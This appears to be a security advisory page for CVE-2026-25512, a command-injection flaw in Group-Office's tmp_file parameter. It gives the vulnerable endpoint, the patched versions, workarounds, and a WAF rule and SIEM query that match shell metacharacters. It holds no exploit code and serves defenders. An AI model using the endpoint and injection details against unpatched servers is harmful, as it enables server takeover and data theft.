CVE-2026-25512
📋 TL;DR
This CVE describes a remote code execution vulnerability in Group-Office where an authenticated attacker can execute arbitrary system commands on the server by injecting shell metacharacters into the tmp_file parameter. The vulnerability affects all Group-Office installations prior to patched versions, requiring authentication but allowing complete server compromise.
💻 Affected Systems
- Group-Office
📦 What is this software?
Group Office by Group Office
Group Office by Group Office
Group Office by Group Office
⚠️ Risk & Real-World Impact
Worst Case
Complete server takeover with attacker gaining root/system privileges, data exfiltration, lateral movement to other systems, and persistent backdoor installation.
Likely Case
Attacker gains shell access to the web server, accesses sensitive CRM data, and potentially compromises the entire server environment.
If Mitigated
Limited impact due to proper network segmentation, minimal privileges, and monitoring catching exploitation attempts early.
🎯 Exploit Status
Exploitation requires authenticated access but is straightforward once authenticated due to direct command injection
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 6.8.150, 25.0.82, or 26.0.5 depending on your version branch
Vendor Advisory: https://github.com/Intermesh/groupoffice/security/advisories/GHSA-579w-jvg7-frr4
Restart Required: Yes
Instructions:
1. Backup your Group-Office installation and database. 2. Download the patched version from the official repository. 3. Replace vulnerable files with patched versions. 4. Restart the web server and Group-Office services.
🔧 Temporary Workarounds
Input Validation Filter
allAdd input validation to reject shell metacharacters in the tmp_file parameter
Modify email/message/tnefAttachmentFromTempFile endpoint to sanitize tmp_file input
WAF Rule
allBlock requests containing shell metacharacters in parameters
Add WAF rule to detect and block patterns like ;, |, &, $, (, ), `, >, < in URL parameters
🧯 If You Can't Patch
- Implement strict network segmentation to isolate Group-Office server from critical systems
- Enable detailed logging and monitoring for suspicious command execution patterns
🔍 How to Verify
Check if Vulnerable:
Check Group-Office version and compare against vulnerable versions. Examine the email/message/tnefAttachmentFromTempFile endpoint code for unsanitized exec() calls.Check Version:
Check Group-Office admin panel or examine version files in installation directoryVerify Fix Applied:
Verify version is 6.8.150, 25.0.82, or 26.0.5 or higher. Test that shell metacharacters in tmp_file parameter no longer execute commands.📡 Detection & Monitoring
Log Indicators:
- Unusual exec() calls in web server logs
- Suspicious parameters containing shell metacharacters in access logs
- Unexpected system command execution from web user context
Network Indicators:
- HTTP requests to email/message/tnefAttachmentFromTempFile with unusual parameters
- Outbound connections from web server to unexpected destinations
SIEM Query:
source="web_server_logs" AND (uri="/email/message/tnefAttachmentFromTempFile" AND (param="tmp_file" AND value MATCHES "[;|&$()`<>]"))